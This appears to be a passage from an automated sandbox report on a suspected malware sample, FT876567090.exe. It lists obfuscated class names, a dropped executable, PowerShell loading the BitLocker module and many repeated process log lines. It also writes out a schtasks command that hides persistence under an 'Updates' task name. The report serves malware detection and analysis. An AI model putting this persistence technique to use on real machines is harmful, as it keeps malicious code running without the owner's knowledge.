Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, GPiGiKyIdU4lsP3SKnM.cs	High entropy of concatenated method names: 'O5LboXui0n', 'qgObzNvSoV', 'LqW6rG2onx', 'Ix1SO6ItA3UZgIDBPq5', 'c3kWHeINIddJ7BQpFti', 'AewacAIgUDDd3FqkCNQ', 'zNP8ceIbX418MB9pDxj', 'Wpk5PVI55hKh7rWxkWt'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, cDt5QPE3LoloEUimR3.cs	High entropy of concatenated method names: 'oyjVnGPOx7', 'rAhVAJQ1Oc', 'rNKVXD3vMn', 'yBdVgi5p15', 'I1JVmLZgk3', 'NV2VleYYxo', 'OGdV9BuBdH', 'dCLVdqFU0y', 'qYqV2GQDPc', 'ODdVPH7R1D'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, jqJyNFnNFGovmngTSY.cs	High entropy of concatenated method names: 'tgaCQtEn9E', 'ayxCs6dpSj', 'ixRCYGJnCf', 'sdxCHdTRyr', 'xqTCjR1CGO', 'TBsYT07TuK', 'ScFY3lWc86', 'lIdYSXIxt2', 'dFJYqdpCpu', 'jZKYEdU5Lh'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, loiuhoc4lM5qqThqVZ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MfGeEgneZv', 'jABeoy3BQ1', 'xiAezLm3PD', 'wuJIr4Z9Ok', 'tmDIyIAycm', 'LkPIekRl01', 'lDXIIEXRnx', 'xUfLRLof7kg1ms0A6I4'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	High entropy of concatenated method names: 'CrKIQyK6vR', 'OBPIGpoXmo', 'q7fIsqSF9t', 'rFuIcUpkDM', 'Ap1IYudBAP', 'X8OICO8SbW', 'hiWIHrQNeJ', 'yTIIjreGac', 'Jy9IKlTkrU', 'uDIIxPYsQa'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, XESGjM5IcVEd4SWQSo.cs	High entropy of concatenated method names: 'qjFY42fCrM', 'fceYF1l3hp', 'qobcXj181V', 'z1ocgCByGU', 'TPAcmRkhb4', 'Lg4cl0kF6L', 'f39c9PwSEY', 'h65cdLAcQ0', 'Cdvc2n4rXx', 'MnkcPjdskD'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, d6o0O5SFWI94poYXwS.cs	High entropy of concatenated method names: 'EbDVuJMHxw', 'O2fVZWvNEO', 'BKIVVd8Gcp', 'DGwVbuPkD6', 'xtaVRFUMGD', 'w6iVhloGjR', 'Dispose', 'HlStGJPbbR', 'tMOtsXnfNW', 't3JtchnPsd'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, OmD8eT1yyXhuQJSvyr.cs	High entropy of concatenated method names: 'SjZZxkcHs1', 'AJEZvIcqSR', 'ToString', 'An3ZGD4ywb', 'dU2Zsiu300', 'bTkZcVDSFh', 's5hZYiNm9b', 'IGLZCFQ8db', 'tm2ZHvsgH0', 'T7kZjwR0j0'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, uZt2wsyroqfI9T4g0lY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DXpJO2TiSA', 'fydJwmxCwD', 'kPZJffpfry', 'v2WJLYwasT', 'yOOJ0p4J6G', 'ICUJDSSEk0', 'M8VJ1DqOrQ'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, etr7vDDutw28yVrRDX.cs	High entropy of concatenated method names: 'ToString', 'bBbWOiQcy3', 'iQFWAwA9Rc', 'gXYWXT4Myn', 'P7oWgSyqqe', 'zxlWmkwIo0', 'DGoWl0ZtFp', 'Xh4W9rIyY2', 'wmFWdpabYN', 'bKeW2bAeIR'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, QHahpPyyjOnLlFYyugX.cs	High entropy of concatenated method names: 'P5fJoNFkqA', 'zcOJzWKm81', 'kIsbrr0aE1', 'jY7byoQNMh', 'FIibeJ93ZG', 'mCvbIa08kM', 'GHvb7Dy8rw', 'vPabQEdHwP', 'bhLbGFlZ25', 'dRUbsuQpRr'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, gGEtiB3eVMC0N94kse.cs	High entropy of concatenated method names: 'UdXZquKpWw', 'yWGZojYI2Y', 'Fbdtrr4cZH', 'w57tyrQhFG', 'nSaZOJs8JB', 'upRZwuR54g', 'kuDZf1xf2R', 'HxBZL29LQj', 'cKQZ0SmhoO', 'HNjZDOQQ7Y'

Source: C:\Users\user\Desktop\FT876567090.exe

File created: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\FT876567090.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
